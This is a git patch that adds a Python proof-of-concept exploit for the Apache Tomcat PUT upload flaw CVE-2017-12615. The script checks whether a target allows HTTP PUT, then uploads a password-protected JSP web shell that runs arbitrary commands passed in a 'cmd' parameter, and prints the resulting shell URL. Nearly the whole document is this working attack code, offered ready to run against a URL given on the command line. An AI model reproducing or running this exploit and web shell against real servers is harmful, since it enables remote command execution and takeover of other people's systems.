From c78e15fe96a5d110437528e3fad67c4a914b8f81 Mon Sep 17 00:00:00 2001 From: b1ueb0y Date: Thu, 21 Sep 2017 09:54:33 +0800 Subject: [PATCH] =?UTF-8?q?=E5=A2=9E=E5=8A=A0CVE-2017-12615=E5=88=A9?= =?UTF-8?q?=E7=94=A8=E8=84=9A=E6=9C=AC?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- t/tomcat/1/poc.py | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 t/tomcat/1/poc.py diff --git a/t/tomcat/1/poc.py b/t/tomcat/1/poc.py new file mode 100644 index 0000000..77cdc79 --- /dev/null +++ b/t/tomcat/1/poc.py @@ -0,0 +1,28 @@ +# -*- coding: utf-8 -*- +#author:hackteam.cn +import random +import requests +import sys + + +def exploit(url): + res='' + body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp + +"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("
"+excuteCmd(request.getParameter("cmd"))+"
");}else{out.println(":-)");}%>''' + filecontent="""<%out.println("shajiba");}%>""" + headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'} + AllowMethod= requests.options(url,timeout=10,verify=False).headers + if 'PUT' in AllowMethod['Allow']: + filename="test"+str(random.randint(666, 666666))+".jsp/" + url=url+filename + putstatus=requests.put(url,headers=headers,data=body,timeout=10,verify=False) + if putstatus.status_code==201: + res= url[0:-1]#?pwd=023&cmd=id + return res + +if len(sys.argv) < 2: + print("python poc.py http://192.168.1.10:8080/") + sys.exit(1) +else: + TARGET=sys.argv[1] + print 'get shell at-->'+exploit(TARGET)